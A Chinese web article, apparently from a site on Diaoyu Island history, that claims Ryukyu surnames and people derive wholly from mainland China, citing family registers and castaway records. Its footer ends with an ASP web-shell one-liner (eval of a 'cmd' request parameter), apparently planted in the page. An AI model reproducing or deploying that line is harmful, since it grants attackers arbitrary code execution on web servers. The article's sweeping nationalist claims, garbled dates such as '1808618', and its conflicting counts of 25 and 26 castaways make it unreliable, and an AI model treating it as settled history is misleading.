钓鱼岛历史

琉球国人的姓氏

时间:2015-2-23 21:47:27  作者:李景科  来源:  查看:815  评论:1
内容摘要:古琉球国人的姓氏,都是中国的姓,中国的名。琉球国人不同于历史上所有的藩属国,他们在文化上与大陆中国人一样讲究风水,过清明节,端午节、中秋节、农历春节、祭祀祖先、列家谱、立牌位,有圆觉寺、孔子庙等,风俗民情、社会人文完全属于儒家文化,采用中国的农历年号,语言、文字皆为中华汉语,典章...
古琉球国人的姓氏,都是中国的姓,中国的名。琉球国人不同于历史上所有的藩属国,他们在文化上与大陆中国人一样讲究风水,过清明节,端午节、中秋节、农历春节、祭祀祖先、列家谱、立牌位,有圆觉寺、孔子庙等,风俗民情、社会人文完全属于儒家文化,采用中国的农历年号,语言、文字皆为中华汉语,典章、制度与大陆朝廷完全一致。这就是琉球国。

迄今为止,在琉球国历史研究中,特别是琉球国族谱家谱研究中,所记载的古琉球国的族群,都来自中国大陆。可以说琉球国人是在不同的历史时期陆续迁移到琉球,是由华夏民族汉族为主的不同族群构成的。

关于琉球国人的姓氏,主要有梁、郑、金、蔡、毛、陈、林、曾、高、吴、李、阮、沈、魏、田、王、马、钱、翁、穆、韩、宗、昆、尹、查、伍、向、武、吉、英、陶等。琉球国有福建李氏族譜.李氏自商末至东周的二百年间一直居住在豫东,从明朝开始,扩散于闽、粤的李氏陆续有人移居琉球国,所以,琉球国派往明、清的通事有许多人姓李,皆系这些华人及其后裔。琉球的阮氏来自于福建省漳州府龍渓。琉球的《蔡氏家谱(仪间家)》记载,为明代入琉球国闽人三十六姓的第三代。琉球国的梁氏,祖籍来自福州。琉球的陳氏,入琉球始于明初﹐大都是明太祖朱元璋派去的水手,琉球的《鄭氏家譜》記載,来自于福建長樂,而;琉球的蕭氏,则来自于河南蘭陵,琉球的孫氏则祖籍在潮州。

17767月初十,有琉球国人漂流到了浙江海岸,有向宣烈等47人。向姓根据《吕氏春秋》载有:“宋向带为太宰,桓族也。华元杀荡泽、向带等舍于睢上……”。可知向带亦为桓公之后,据有关研究。向姓发祥于今河南商丘一带。1808618,有琉球永照屋等十一人漂流到定海县。永姓是中国的姓氏,在汉朝就有了,据《郑樵通志》记载:“永氏,见《姓苑》,《列仙传》有永石公。18766月初八,浙江平湖知县禀报有25位琉球人遭遇大风漂流海岸。这26人的姓名如下:林克旺,比嘉仁居,平克兴,薛有祥,宫忱爱,堵上江,蔡仪保,梁宫城,祖玉势,元中村渠,内间,马比嘉,元新垣,牛金城,恭池原,毛次良,堵思德,薛仲里,俞三良,毛宫平,和真牛,蔡真三,祖照屋,牛新屋,和蒲户。这个名单里,除了两个古琉球国本地的姓氏外,其余都是中国的姓名。
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):